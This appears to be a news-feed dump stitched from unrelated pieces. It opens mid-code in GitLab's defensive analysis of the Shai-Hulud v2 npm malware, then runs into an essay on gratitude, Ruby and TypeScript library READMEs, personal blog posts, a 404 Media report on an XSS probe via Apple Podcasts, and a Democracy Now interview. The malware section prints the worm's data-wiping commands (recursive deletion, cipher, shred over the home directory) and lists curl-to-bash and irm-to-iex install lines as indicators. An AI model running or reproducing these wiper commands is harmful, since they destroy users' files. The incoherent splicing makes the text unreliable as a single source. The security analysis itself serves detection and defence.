"for /d %%i in (\"%USERPROFILE%*\") do rd /S /Q \"%%i\" & " +
"cipher /W:%USERPROFILE%" // Overwrite deleted data
]);
} else {
// Attempts to shred all writable files in home directory
Bun.spawnSync(["bash", "-c",
"find \"$HOME\" -type f -writable -user \"$(id -un)\" -print0 | " +
"xargs -0 -r shred -uvz -n 1 && " + // Overwrite and delete
"find \"$HOME\" -depth -type d -empty -delete" // Remove empty dirs
]);
}
process.exit(0);
}
}
}
}
This creates a dangerous scenario. If GitHub mass-deletes the malware's repositories or npm bulk-revokes compromised tokens, thousands of infected systems could simultaneously destroy user data. The distributed nature of the attack means that each infected machine independently monitors access and will trigger deletion of the user’s data when a takedown is detected.
Indicators of compromise
To aid in detection and response, here is a more comprehensive list of the key indicators of compromise (IoCs) identified during our analysis.
Type      | Indicator                                    | Description
file      | bun_environment.js                           | Malicious post-install script in node_modules directories
directory | .truffler-cache/                             | Hidden directory created in user home for Trufflehog binary storage
directory | .truffler-cache/extract/                     | Temporary directory used for binary extraction
file      | .truffler-cache/trufflehog                   | Downloaded Trufflehog binary (Linux/Mac)
file      | .truffler-cache/trufflehog.exe               | Downloaded Trufflehog binary (Windows)
process   | del /F /Q /S "%USERPROFILE%*"                | Windows destructive payload command
process   | shred -uvz -n 1                              | Linux/Mac destructive payload command
process   | cipher /W:%USERPROFILE%                      | Windows secure deletion command in payload
command   | curl -fsSL https://bun.sh/install | bash     | Suspicious Bun installation during NPM package install
command   | powershell -c "irm bun.sh/install.ps1|iex"   | Windows Bun installation via PowerShell
How GitLab can help you detect this malware campaign
If you are using GitLab Ultimate, you can leverage built-in security capabilities to immediately surface exposure tied to this attack within your projects.
First, enable
Dependency Scanning
to automatically analyze your project's dependencies against known vulnerability databases.
If infected packages are present in your
package-lock.json
or
yarn.lock
files, Dependency Scanning will flag them in your pipeline results and the Vulnerability Report.
For complete setup instructions, refer to the
Dependency Scanning documentation
.
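As a minimal sketch, enabling it usually comes down to including GitLab's built-in CI/CD template in your .gitlab-ci.yml (template path as documented by GitLab; adapt the include to your existing pipeline configuration):

# Minimal sketch: enable Dependency Scanning via GitLab's built-in CI/CD template.
include:
  - template: Security/Dependency-Scanning.gitlab-ci.yml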
Once enabled, merge requests introducing a compromised package will surface a warning before the code reaches your main branch.
Next,
GitLab Duo Chat
can be used with Dependency Scanning to provide a fast way to check your project's exposure without navigating through reports. From the dropdown, select the
Security Analyst Agent
and simply ask questions like:
"Are any of my dependencies affected by the Shai-Hulud v2 malware campaign?"
"Does this project have any npm supply chain vulnerabilities?"
"Does this project have any npm supply chain vulnerabilities?"
"Show me critical vulnerabilities in my JavaScript dependencies."
The agent will query your project's vulnerability data and provide a direct answer, helping security teams triage quickly across multiple projects.
For teams managing many repositories, we recommend combining these approaches: use Dependency Scanning for continuous automated detection in CI/CD, and the Security Analyst Agent for ad-hoc investigation and rapid response during active incidents like this one.
Looking ahead
This campaign represents an evolution in supply chain attacks where the threat of collateral damage becomes the primary defense mechanism for the attacker's infrastructure. The investigation is ongoing as we work with the community to understand the full scope and develop safe remediation strategies.
GitLab's automated detection systems continue to monitor for new infections and variations of this attack. By sharing our findings early, we hope to help the community respond effectively while avoiding the pitfalls created by the malware's dead man's switch design.
The Dark Side of Gratitude: When Thankfulness Becomes a Tool of Control
Portside
portside.org
2025-11-27 15:16:38
Kurt Stand
Thu, 11/27/2025 - 10:16
We live in a world that constantly tells us to “count our blessings.” Gratitude is praised as a moral virtue, a mental tonic, a gateway to happiness. Entire industries are built on it: journals, apps, workshops, and
social media
trends. But what if gratitude isn’t a virtue at all? What if, instead of elevating us, it functions as a quiet mechanism that traps, silences, and pacifies us?
At first glance, gratitude seems harmless—even virtuous. A simple “thank you” can smooth social interactions, remind us of the positive, and cultivate humility. Yet much of our gratitude is coerced, performative, or socially demanded. We are expected to be thankful, whether or not we genuinely feel it. Miss the cue, fail to smile, or silently resent the “blessing” offered, and we are framed as ungrateful, even morally deficient. Gratitude often functions less as a choice and more as a social leash, compelling people to perform virtue on cue.
Take the workplace, for example. Employees are often reminded to “be grateful for having a job” when faced with low pay, long hours, or toxic conditions. The intention may be to inspire appreciation, but the ultimate effect is control—gratitude becomes a tool for compliance. By teaching people to “be grateful” for injustice or minimal provision, society trains obedience under the guise of virtue. It pacifies dissatisfaction by framing fundamental rights and fair treatment as privileges rather than entitlements. In such cases, thankfulness isn’t just a moral exercise—it’s a mechanism to normalize inequity.
Gratitude can act as emotional camouflage. We are taught to appreciate our lives, our health, our families, sometimes even our misfortunes. Perspective is valuable, but the relentless pressure to be thankful can suppress genuine emotions. Anger, grief, frustration—signals that something is wrong—are nudged aside. We are told to “look on the bright side,” even when the side that demands closer scrutiny is dark. Gratitude, in this sense, becomes a velvet handcuff: soft, polite, yet restraining real feelings and masking problems we need to confront. The human psyche thrives on complexity, but “gratitude culture” encourages simplification: Everything must be filtered through a lens of thankfulness.
Gratitude also carries a heavy psychological burden. Feeling obligated to reciprocate kindness or opportunity breeds stress and anxiety. Recognizing genuine generosity is one thing; living under a constant sense of debt—to friends, family, employers, or society—is another. Those with fewer resources bear this pressure more heavily: Expectations of gratitude are imposed when there is little power to refuse or negotiate social norms. For some, gratitude becomes an unspoken
debt
that never expires, a pressure cooker of stress and resentment. In these cases, it is not liberating, but a subtle form of coercion.
We are also encouraged to turn gratitude inward as a self-help tool: “Practice daily gratitude, and you will be happier.” While brief reflections on what we value can improve mood, this framing risks individualizing systemic problems. Feeling unhappy? Focus on what you do have. Struggling with debt, illness, or social injustice? Count your blessings. Gratitude thus becomes a psychological Band-Aid, a quiet insistence that the problem lies not in circumstances or structures but in our own perception. It is both a pacifier and a distraction from meaningful action.
It’s worth noting that gratitude, in its purest, voluntary form, is not inherently bad. Genuine, spontaneous thankfulness can deepen relationships, foster empathy, and anchor us in meaningful moments. The problem arises when gratitude is demanded, packaged, or weaponized—when it is less a personal reflection and more a social or institutional expectation. That is when it stops being a virtue and becomes a subtle tool of emotional and psychological manipulation.
Consider the social
media
dimension. We post “thankful” photos, recount the blessings of our lives, and share curated moments of appreciation. These public expressions rarely arise from raw emotion—they are curated for approval, likes, and social validation. Such displays may appear harmless, even charming, but they reinforce the notion that gratitude is an obligation rather than an
organic
experience.
Even in intimate settings, gratitude can carry hidden pressures. Being thankful to a loved one can generate unspoken debts or expectations: a favor must be repaid, a kindness acknowledged, a gesture reciprocated. This is not always harmful, but it becomes so when gratitude is demanded or used as leverage. In this sense, gratitude is not purely virtuous; it is a social contract with emotional consequences.
Step back, and a pattern emerges: Gratitude is often less about authentic appreciation and more about maintaining social harmony, suppressing discontent, and normalizing
inequality
. It is a quietly coercive force. And yet, we are rarely taught to question it. We are trained to assume that gratitude is inherently virtuous, morally neutral, or personally beneficial. What if, instead, we allowed ourselves to interrogate it—to ask whether our thankfulness is truly ours or imposed?
The real question is not whether gratitude can be good. It can. The question is whether our culture has overvalued it, weaponized it, or confused performative thankfulness with genuine reflection. By unquestioningly embracing gratitude as a moral imperative, we risk ignoring discomfort, overlooking injustice, and silencing authentic emotion. Sometimes, the bravest act is not to be thankful—to allow ourselves anger, frustration, or dissatisfaction. Sometimes the healthiest choice is to withhold thanks, at least until we genuinely feel it.
In rethinking gratitude, we are not rejecting kindness or appreciation. We are reclaiming the right to feel emotions honestly, without guilt or coercion. We are resisting the subtle pressures that tell us to be grateful for situations that do not deserve it. Authentic gratitude, like all virtues, cannot be commanded; it must emerge voluntarily, thoughtfully, and without obligation. Only then can it be meaningful.
The braver, wiser act is to stop counting blessings on command, to resist the soft tyranny of enforced gratitude, and to reclaim our right to anger, dissatisfaction, and honesty. Gratitude should serve us—not the agendas of others.
Martina Moneke writes about art, fashion, culture, and politics. In 2022, she received the Los Angeles Press Club’s First Place Award for Election Editorials at the 65th Annual Southern California Journalism Awards. She is based in Los Angeles and New York.
Common Dreams is a reader-supported independent news outlet created in 1997 as a new media model. Our nonprofit newsroom covers the most important news stories of the moment. Common Dreams free online journalism keeps our millions of readers well-informed, inspired, and engaged.
LowType introduces the concept of "type expressions" in method arguments. When an argument's default value resolves to a type instead of a value then it's treated as a type expression. Now you can have types in Ruby in the simplest syntax possible:
class MyClass
  include LowType

  def say_hello(greeting: String)
    # Raises exception at runtime if greeting is not a String.
  end
end
Default values
Place | after the type definition to provide a default value when the argument is nil:
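As a minimal sketch (the method and argument names here are illustrative, not taken from the library's documentation), a typed argument with a default value looks like this:

def say_hello(greeting: String | 'Hello')
  # greeting is type checked as a String; 'Hello' is used when the argument is nil.
  puts greeting
end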
If you need a multi-line return type/value then I'll even let you put the
-> { T }
on multiple lines, okay? I won't judge. You are a unique flower
🌸
with your own style, your own needs. You have purpose in this world and though you may never find it, your loved ones will cherish knowing you and wish you were never gone:
def say_farewell_with_a_long_method_name(farewell: String) -> {
  ::Long::Name::Space::CustomClassOne |
  ::Long::Name::Space::CustomClassTwo |
  ::Long::Name::Space::CustomClassThree
}
  # Code that returns an instance of one of the above types.
end
Instance variables
To define typed
@instance
variables use the
type_[reader, writer, accessor]
methods.
These replicate
attr_[reader, writer, accessor]
methods but also allow you to define and check types.
Type Reader
type_reader name: String           # Creates a public method called `name` that gets the value of @name
name                               # Get the value with type checking

type_reader name: String | 'Cher'  # Gets the value of @name with a default value if it's `nil`
name                               # Get the value with type checking and return 'Cher' if the value is `nil`
Type Writer
type_writer name: String   # Creates a public method called `name=(arg)` that sets the value of @name
name = 'Tim'               # Set the value with type checking
Type Accessor
type_accessor name: String           # Creates public methods to get or set the value of @name
name                                 # Get the value with type checking
name = 'Tim'                         # Set the value with type checking

type_accessor name: String | 'Cher'  # Get/set the value of @name with a default value if it's `nil`
name                                 # Get the value with type checking and return 'Cher' if the value is `nil`
name = 'Tim'                         # Set the value with type checking
ℹ️
Multiple Arguments
You can define multiple typed accessor methods just like you would with
attr_[reader, writer, accessor]
:
type_accessor name: String | nil, occupation: 'Doctor', age: Integer | 33

name          # => nil
occupation    # => Doctor (not type checked)
age = 'old'   # => Raises ArgumentTypeError
age           # => 33
Local variables
type()
alias:
low_type()
To define typed
local
variables at runtime use the
type()
method:
my_var = type MyType | fetch_my_object(id: 123)
my_var
is now type checked to be of type
MyType
when assigned to.
Don't forget that these are just Ruby expressions and you can do more conditional logic as long as the last expression evaluates to a value:
my_var = type String | (say_goodbye || 'Hello Again')
ℹ️
Enumerables
To use the
Array[]
/
Hash[]
enumerable syntax with
type()
you must add
using LowType::Syntax
when including LowType:
include LowType
using LowType::Syntax
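As a small, hedged sketch of combining the two, following the type() pattern above and the Array[T] form described under Syntax below (fetch_tags is a hypothetical method standing in for your own code):

my_tags = type Array[String] | fetch_tags   # my_tags is type checked as an Array of Strings when assigned to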
Syntax
[T]
Enumerables
Array[T] and Hash[T] class methods represent enumerables in the context of type expressions. If you need to create a new Array/Hash then use Array.new()/Hash.new(), or the Array and Hash literals [] and {}. This is the same syntax that RBS uses, and we need to get used to these class methods returning type expressions if we're ever going to have inline types in Ruby. RuboCop also suggests {} over Hash[] syntax for creating hashes.
| Union Types / Default Value
The pipe symbol (|) is used in the context of type expressions to define multiple types as well as provide the default value:
To allow multiple types separate them between pipes:
my_var = TypeOne | TypeTwo
The last value/nil defined becomes the default value:
my_var = TypeOne | TypeTwo | nil
If no default value is defined then the argument will be required.
-> { T }
Return Type
The -> { T } syntax is a lambda without an assignment to a local variable. This is valid Ruby that can be placed immediately after a method definition, on the same line, to visually look like the output of that method. It's inert and doesn't run when the method is called, similar to how default values are never called if the argument is managed by LowType. Pretty cool stuff, yeah? Your type expressions won't keep re-evaluating in the wild 🐴, only on class load.
ℹ️ Note: A method that takes no arguments must include empty parameters () for the -> { T } syntax to be valid; def method() -> { T }.
value(T)
Value Expression
alias:
low_value()
To treat a type as if it were a value, pass it through
value()
first:
def my_method(my_arg: String | MyType | value(MyType))   # => MyType is the default value
Performance
LowType evaluates type expressions on
class load
(just once) to be efficient and thread-safe. Then the defined types are checked per method call.
However,
type()
type expressions are evaluated when they are called at
runtime
on an instance, and this may impact performance.
Method param types   | Evaluation: 🟢 Class load | Validation: 🟠 Runtime | Example: def method(name: T)
Method return types  | Evaluation: 🟢 Class load | Validation: 🟠 Runtime | Example: def method() -> { T }
Instance types       | Evaluation: 🟢 Class load | Validation: 🟠 Runtime | Example: type_accessor(name: T)
Local types          | Evaluation: 🟠 Runtime    | Validation: 🟠 Runtime | Example: type(T)
Architecture
LowType only affects the class that it's
include
d into. Class methods
Array[]
/
Hash[]
are modified for the type expression enumerable syntax (
[]
) to work, but only for LowType's internals (using refinements) and not the
include
d class. The
type()
method requires
using LowType::Syntax
if you want to use the enumerable syntax but will still only affect the
Array[]
/
Hash[]
class methods of the
include
d class.
Config
Copy and paste the following and change the defaults to configure LowType:
LowType.configure do |config|
  # Set to :log or :none to disable the raising of an exception when types are invalid. [UNRELEASED]
  config.error_mode = :error

  # Set to :value to show a concatenated inspect of the invalid param when an error is raised. Or :none to redact.
  # Great for debugging, bad for security, and makes tests harder to write when the error messages are so dynamic.
  config.output_mode = :type
  config.output_size = 100

  # Set to true to type check all elements of an Array/Hash (not just the first)
  config.deep_type_check = false

  # The "|" pipe syntax requires a monkey-patch but can be disabled if you don't need union types with default values.
  # This is the only monkey-patch in the entire library and is a relatively harmless one, see "syntax/union_types.rb".
  # Set to false and typed params will always be required, as there's no "| nil" syntax (remove type to make optional)
  config.union_type_expressions = true
end
Types
Basic types
String
Integer
Float
Array
Hash
nil (represents an optional value)
ℹ️ Any class/type that's available to Ruby is available to LowType, you just might need to require it.
Complex types
Boolean (accepts true/false) [UNRELEASED]
Tuple (subclass of Array)
Status (subclass of Integer) - TODO: Check integer to be a valid HTTP status code
Headers (subclass of Hash)
HTML (subclass of String) - TODO: Check that string is HTML
JSON (subclass of String) - TODO: Check that string is JSON
XML (subclass of String) - TODO: Check that string is XML
Integrations
Because LowType is low-level it should work with method definitions in any framework out of the box. With that in mind we go a little further here at free-software-by-shadowy-figure-co to give you that extra framework-specific-special-feeling:
Sinatra
include LowType
in your modular
Sinatra::Base
subclass to get Sinatra specific return types.
LowType will automatically add the necessary
content_type
[UNRELEASED] and type check the return value:
require 'sinatra/base'
require 'low_type'

class MyApp < Sinatra::Base
  include LowType

  # A simple string response type.
  get '/' do -> { String }
    'body'
  end

  # Standard types Sinatra uses.
  get '/' do -> { Array[Integer, Hash, String] }
    [200, {}, '<h1>Hello!</h1>']
  end

  # Types specifically for Sinatra.
  get '/' do -> { Tuple[Status, Headers, HTML] }
    [200, {}, '<h1>Hello!</h1>']
  end
end
Rubocop
Because we're living in the future, Rubocop isn't ready for us. Put the following in your
.rubocop.yml
:
# Support LowType return value "-> { T }" syntax.
Style/TrailingBodyOnMethodDefinition:
  Enabled: false
Layout/IndentationConsistency:
  Enabled: false
Layout/MultilineBlockLayout:
  Enabled: false
Style/DefWithParentheses:
  Enabled: false
Lint/Void:
  Enabled: false

# Support Array[]/Hash[] syntax.
Style/RedundantArrayConstructor:
  Enabled: false
Installation
Add
gem 'low_type'
to your Gemfile then:
bundle install
Philosophy
🦆
Duck typing is beautiful.
Ruby is an amazing language
BECAUSE
it's not typed. I don't believe Ruby should ever be fully typed, but you should be able to sprinkle in types into some areas of your codebase where you'd like self-documentation and a little reassurance that the right values are coming in/out.
🌀
Less DSL. More types.
As much as possible LowType looks just like Ruby if it had types. There's no special method calls for the base functionality, and defining types at runtime simply uses a
type()
method which almost looks like a
type
keyword, had Ruby implemented types.
🤖
AI makes you dumb.
AI is theoretically a cool concept but in practice capitalism just uses it to steal wealth.
Social media has become a reminder of something precious we are losing in the age of LLMs:
unique voices
.
Over time, it has become obvious just how many posts are being generated by an LLM. The tell is the voice. Every post sounds like it was posted by the same social media manager.
If you rely on an LLM to write all your posts, you are making a mistake.
Your voice is an asset. Not just what you want to say, but how you say it.
Your voice is unique. It is formed from your lifetime of lived experiences. No one's voice will be exactly like yours.
Your voice becomes recognizable. Over many posts it becomes something people subconsciously connect with, recognize, trust, and look forward to.
Your voice provides the framework for the impression you leave in a job interview, while networking at a meet-up, or with a co-worker.
Years ago I got a job thanks to my blog posts. A manager wanted my voice influencing their organization. Your voice is an asset.
Your voice matures and becomes even more unique with time and practice.
LLMs can rob you of that voice, and the rest of us lose something precious in the process.
Having an LLM write "in your voice" is not the same. Your voice is not static. It changes with the tides of your life and state of mind. Your most impactful message may come because it was the right moment and you were in the right frame of mind.
Let your voice grow with use. Let it be unique.
Do not let one of your greatest assets fade into atrophy, wilted by cognitive laziness.
Write in
your
voice.
I do not care what the linguistic remix machine juggles into being.
I care what you have to say.
Don't be a scary old guy: My 40s survival strategy with charm
Hi, it’s
Takuya
.
Last week I had my birthday and turned 41 (November 19th).
When I was younger, I could never really picture what life in my 40s would look like. It’s this vague age where you don’t have a clear image of how you’re supposed to live, right? Even if I try to look back at my dad at this age, he was always at work during the day, so he’s not much of a reference.
I make a living as an indie developer
, and thanks to what I built up through my 20s and 30s, I can live the way I do now. Compared to a typical Japanese salaryman, I can join childcare much more flexibly, and I get to spend a lot of time with my kid. I’ve even made some “mom friends (mama-tomo)” at kindergarten.
In this post, I'd like to share my survival strategy for the 40s. As the title says, the conclusion is:
“charm”
— being warm and approachable.
Let me explain why I think this kind of charm matters so much for middle-aged men.
TL;DR
“You’ve got presence” just means “You look older now.”
Make a smile. A grumpy middle-aged guy is just scary
Be humble. The more achievements you stack, the more people shrink back
Use the charm of contrast
“You’ve got presence” just means “You look older now.”
For students, guys in their 40s are full-on old dudes. At least that’s how I saw them. It’s basically the age of school teachers.
When I hit my late 30s, people around me started to say things like:
“You’ve got
kanroku
now.”
In Japanese,
kanroku
means something like “gravitas” or “presence.”
And no, they didn’t mean my belly was growing.
At first, I secretly thought:
“Finally, my life experience is starting to radiate as an aura!”
…but over time I realized that wasn’t it at all. It simply meant: I got older.
In other words, “You’ve aged,” “You look older now,” wrapped in the most positive wording possible.
I mean, think about it. What even is “aura,” really? lol
If I’ve really built up so much life experience, why am I still getting scolded by kindergarten teachers for being late to the bus pick-up? It doesn’t feel like I’m walking around radiating some wise, dignified aura.
Make a smile. A grumpy middle-aged guy is just scary
Having gravitas doesn’t actually help you that much. If a middle-aged guy is frowning, shoulders slumped, walking around with a dark cloud over him, you just want to keep your distance, right?
If you wrap yourself in charm instead, you can cancel out like half of that rough “old guy presence.”
I used to work part-time at a café. When I asked the manager why he decided to hire me, he said:
“Because your smile was good.”
On YouTube as well, I try to make a smile in my videos. A smile is a key ingredient of charm.
To cancel out this heavy “presence,” I want to be even more intentional about smiling and staying approachable in my daily life.
Be humble. The more achievements you stack, the more people shrink back
If you just keep doing something for a long time, your achievements naturally pile up. And if you’re lucky, some of them end up being work that lots of people praise you for.
But then one day you realize: The friends who used to argue with you freely and push back hard are suddenly keeping their distance.
Indie dev is already lonely enough. But the more “achievements” you stack, the more your potential conversation partners quietly disappear.
I read somewhere that Hirohiko Araki, the manga artist behind
JoJo’s Bizarre Adventure
, once said that he’s become so successful and revered that people are now scared of him, and no one gives him advice anymore.
It makes sense. If you imagine giving feedback to a famous author or legendary director, it feels terrifying, right?
That’s why Araki-sensei apparently gets really happy when someone ignores that aura, doesn’t shrink back, and just casually says what they think.
From what I’ve seen of him on TV and such, he seems full of charm. He smiles, teaches kids, and comes across as very gentle and kind. He’s a great example. If even someone like him still gets put on a pedestal and loses people to bounce ideas off, I absolutely have no business acting all high and mighty.
Use the charm of contrast
The more serious and stern someone looks, the more powerful their smile becomes. That contrast is what makes it hit. In Japanese, we even have a word for this:
gap moe
(ギャップ萌え) — the charm that comes from an unexpected contrast in someone’s personality or appearance.
Take guitarist Eddie Van Halen, for example:
When I picture an amazing guitarist, I tend to imagine someone completely lost in their own world, making intense faces while they play.
But Eddie often turns to the crowd and smiles, clearly trying to entertain and enjoy it
with
them. That attitude is incredibly likeable.
Programmers are a good example of a job that’s hard for people to picture. When mom friends ask what I do and I say:
“I’m a programmer.”
I often get:
“Ah, I don’t really know much about computers…”
It’s not that they’re rejecting it; they just can’t imagine what I actually do, so they don’t know how to respond. The fewer shared reference points you have with someone, the more important it is to approach them with a soft, relaxed attitude. You don’t have to explain everything in detail. If they can at least feel that “he seems to enjoy his work and looks like he’s having fun,” that’s more than enough.
So that’s what I want to value in my 40s.
Lately, I’ve been feeling like younger people show me more respect than before. Precisely because of that, this is the time to
not
act superior, but instead live humbly and gently. I want to keep learning from younger generations and be inspired by them. I want to stay in touch with new values and cultures all the time. To do that, I have to break through the “gravitas” barrier myself. And I think charm is essential for that.
If you’re around my age, what do
you
want to value in your life?
I’d love to hear.
Here’s to good 40s for all of us!
Thanks for reading. Inkdrop is a Markdown-focused note-taking app for developers. It’s not about having tons of features — its strengths are the clean design and simplicity. If you’re looking for a clean and simple notes app, check it out:
SyncKit is a
production-ready sync engine
that makes building local-first applications trivial.
"Add
sync.document()
to your app, get real-time sync automatically."
The problem:
Building sync from scratch takes months. Existing solutions are complex (Yjs), expensive (Firebase), or don't work offline (Supabase).
The solution:
SyncKit gives you production-ready sync in 3 lines of code.
const sync = new SyncKit()
await sync.init()

const doc = sync.document<Todo>('todo-123')
await doc.update({ completed: true })
// ✨ Works offline, syncs automatically, resolves conflicts
🎬 See It In Action
Real-time collaboration with offline resilience:
Watch tasks sync instantly across tabs—even while offline. The example app demonstrates SyncKit's offline-first capabilities combined with smart browser storage to create a seamless collaborative experience.
✨ Why SyncKit?
🚀
Works When Internet Doesn't
True offline-first architecture—not just caching. Your app works perfectly on planes, trains, tunnels, and coffee shops with spotty WiFi.
import { SyncKit } from '@synckit-js/sdk'
import { SyncProvider, useSyncDocument } from '@synckit-js/sdk/react'

// Initialize (works offline-only, no server needed!)
const sync = new SyncKit()
await sync.init()

function App() {
  return (
    <SyncProvider synckit={sync}>
      <TodoApp />
    </SyncProvider>
  )
}

function TodoApp() {
  const [todo, { update }] = useSyncDocument<Todo>('todo-1')

  if (!todo || !todo.text) return <div>Loading...</div>

  return (
    <div>
      <input
        type="checkbox"
        checked={todo.completed}
        onChange={(e) => update({ completed: e.target.checked })}
      />
      <span>{todo.text}</span>
    </div>
  )
}
graph TD
A[Your Application<br/>React/Vue/Svelte] --> B[SyncKit SDK<br/>TypeScript]
B -->|Simple API| B1[document, text, counter]
B -->|Framework adapters| B2[React/Vue/Svelte hooks]
B -->|Offline queue| B3[Storage adapters]
B --> C[Rust Core Engine<br/>WASM + Native]
C -->|80% of use cases| C1[LWW Sync]
C -->|Collaborative editing| C2[Text CRDTs]
C -->|Advanced features| C3[Custom CRDTs<br/>counters, sets]
C --> D[IndexedDB Storage<br/>Your local source of truth]
D -.->|Optional| E[SyncKit Server<br/>TypeScript/Python/Go/Rust]
E -->|Real-time sync| E1[WebSocket]
E -->|Persistence| E2[PostgreSQL/MongoDB]
E -->|Security| E3[JWT auth + RBAC]
style A fill:#e1f5ff,stroke:#333,stroke-width:2px,color:#1a1a1a
style B fill:#fff4e1,stroke:#333,stroke-width:2px,color:#1a1a1a
style C fill:#ffe1e1,stroke:#333,stroke-width:2px,color:#1a1a1a
style D fill:#e1ffe1,stroke:#333,stroke-width:2px,color:#1a1a1a
style E fill:#f0e1ff,stroke:#333,stroke-width:2px,color:#1a1a1a
// Note: Text CRDT API is planned for v0.2.0
const text = sync.text('document-456')
await text.insert(0, 'Hello ')
text.subscribe(content => editor.setValue(content))
// Character-level sync, conflict-free convergence
// Note: Counter API is planned for v0.2.0
const counter = sync.counter('likes-789')
await counter.increment()
// Conflict-free counter (additions never conflict)
In addition to the following, see the
tests folder
for more example
.prompt
files.
Basic prompt with stdin
---
model: anthropic/claude-sonnet-4-20250514
---
Summarize this text: {{STDIN}}
cat article.txt | ./runprompt summarize.prompt
The special
{{STDIN}}
variable always contains the raw stdin as a string.
Structured JSON output
Extract structured data using an output schema:
---
model: anthropic/claude-sonnet-4-20250514
input:
  schema:
    text: string
output:
  format: json
  schema:
    name?: string, the person's name
    age?: number, the person's age
    occupation?: string, the person's job
---
Extract info from: {{text}}
echo"John is a 30 year old teacher"| ./runprompt extract.prompt
# {"name": "John", "age": 30, "occupation": "teacher"}
Fields ending with
?
are optional. The format is
field: type, description
.
Chaining prompts
Pipe structured output between prompts:
echo"John is 30"| ./runprompt extract.prompt | ./runprompt generate-bio.prompt
The JSON output from the first prompt becomes template variables in the second.
CLI overrides
Override any frontmatter value from the command line:
Someone Is Trying to ‘Hack’ People Through Apple Podcasts
404 Media
www.404media.co
2025-11-27 14:00:21
For months Apple Podcasts has been randomly opening spirituality and religion podcasts by itself, and one case directing listeners to a potentially malicious website....
Something very strange is happening to the Apple Podcasts app. Over the last several months, I’ve found both the iOS and Mac versions of the Podcasts app will open religion, spirituality, and education podcasts with no apparent rhyme or reason. Sometimes, I unlock my machine and the podcast app has launched itself and presented one of the bizarre podcasts to me. On top of that, at least one of the podcast pages in the app includes a link to a potentially malicious website. Here are the titles of some of the very odd podcasts I’ve had thrust upon me recently (I’ve trimmed some and defanged some links so you don’t accidentally click one):
“5../XEWE2'""""onclic…”
“free will, free willhttp://www[.]sermonaudio[.]com/rss_search.asp?keyword=free%will on SermonAudio”
There was another with a title in Arabic that loosely translates to “Words of Life” and includes someone’s Gmail address. Sometimes the podcasts do have actual audio (one was a religious sermon); others are completely silent. The podcasts are often years old, but for some reason are being shown to me now.
I’ll be honest: I don’t really know what exactly is going on here. And neither did an expert I spoke to. But it’s clear someone, somewhere, is trying to mess with Apple Podcasts and its users.
“The most concerning behavior is that the app can be launched automatically with a podcast of an attacker's choosing,” Patrick Wardle, a macOS security expert and the creator of Mac-focused cybersecurity organization Objective-See, said. “I have replicated similar behavior, albeit via a website: simply visiting a website is enough to trigger Podcasts to open (and load a podcast of the attacker's choosing), and unlike other external app launches on macOS (e.g. Zoom), no prompt or user approval is required.”
💡
Do you know anything else about these weird podcasts? I would love to hear from you. Using a non-work device, you can message me securely on Signal at joseph.404 or send me an email at joseph@404media.co.
To caveat straight away: this isn’t that alarming. This is not the biggest hack or issue in the world. But it’s still very weird behavior and Apple has not responded to any of my requests for comment for months. “Of course, very much worth stressing, on its own this is not an attack,” Wardle continued. “But it does create a very effective delivery mechanism if (and yes, big if) a vulnerability exists in the Podcasts app.”
That said, someone has tried to deliver something a bit more malicious through the Podcasts app. It’s the first podcast I mentioned, with the title “5../XEWE2'""""onclic…”. Maybe some readers have already picked up on this, but the podcast is trying to direct listeners to a site that attempts to perform a cross-site scripting, or XSS, attack. XSS is basically when a hacker injects their own malicious code into a website that otherwise looks legit. It’s definitely a low-hanging fruit kind of attack, at least today. I remember it being way, way more common 10 years ago, and it was ultimately what led to the infamous MySpace worm.
The weird link is included in the “Show Website” section of the podcast’s page. Visiting that redirects to another site, “test[.]ddv[.]in[.]ua.” A pop-up then says “XSS. Domain: test[.]ddv[.]in[.]ua.”
I’m seemingly not the only one who has seen this. A review left in the Podcasts app just a few weeks ago says “Scam. How does Apple allow this attempted XSS attack?” The person gave the podcast one star. That podcast itself dates from around 2019.
“Whether any of those attempts have worked remains unclear, but the level of probing shows that adversaries are actively evaluating the Podcasts app as a potential target,” Wardle said.
Overall, the whole thing gives a similar vibe to Google Calendar spam, where someone will sneakily add an event to your calendar and include whatever info or link they’re trying to spread around. I remember that being a pretty big issue a few years ago.
Apple did not acknowledge or respond to five emails requesting comment. The company did respond to other emails for different articles I was working on across that time.
My Father Is a Warrior & My Hero: An Interview with Leonard Peltier's Daughter Marquetta
Democracy Now!
www.democracynow.org
2025-11-27 13:50:26
Marquetta Shields-Peltier was just a toddler when her father, Leonard Peltier, was jailed in 1976. During our recent trip to Turtle Mountain Reservation in North Dakota, we spoke to Marquetta about the campaign to free her father and what it meant to see him released in February....
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN:
While we were there, I also had a chance to talk to one of Leonard Peltier’s daughters, who was just a toddler when Leonard Peltier was jailed in 1976.
MARQUETTA SHIELDS-PELTIER:
My name is Marquetta Shields-Peltier. I’m the daughter of Leonard Peltier. I’m 52 years old. And I’m standing outside my dad’s house. After 49 years of imprisonment, my dad is finally free, and I’m home with him.
AMY GOODMAN:
So, you live in Lawrence. You have for decades. Lawrence is not that far from Leavenworth, where he was held for many, many years before moving on to Coleman in Florida. What are your earliest memories of your dad?
MARQUETTA SHIELDS-PELTIER:
My earliest memory of me and my dad was actually in Marion, Illinois, when he was there, before it was supermax. I was there with my grandmother, Hazel, and my little brother, Waha. And I remember sitting beside my grandma, waiting for my dad to come out those doors for the first time ever. And I remember asking my grandma, I said, “Do you think my dad’s gonna like me?” And she’s like, “Yeah, he’s gonna love you.” And I said, “Is it OK if I hug my dad?” You know? And she was like, “Yeah, of course. Go hug him.” And she kind of pushed me in that door, towards the door. And when it opened and he came out, he just smiled, and I ran to him. And I just remember him hugging me, and I was like, “That’s my dad. That’s my dad,” you know, because I hadn’t — I don’t have any memories prior to that. They said we lived together in Oregon, but I don’t remember that. They said we saw him in Canada when he — before they extradited him, but I don’t remember that.
AMY GOODMAN:
How old were you when you saw him in Marion?
MARQUETTA SHIELDS-PELTIER:
I think I was around 7 or 8 years old, yeah.
AMY GOODMAN:
So, what was it like through those years? I mean, it’s the only thing you knew, but to visit him only behind bars?
MARQUETTA SHIELDS-PELTIER:
When I was young, it was really confusing. It was hard to understand why, you know, because he kind of protected me, probably because I was so young and I didn’t understand what was going on. But it was bittersweet, because I loved going there. And, like, for me, that was normal, you know, to see my dad there. Even though there’s dads around me with my other friends and stuff, I just — for me, that was normal.
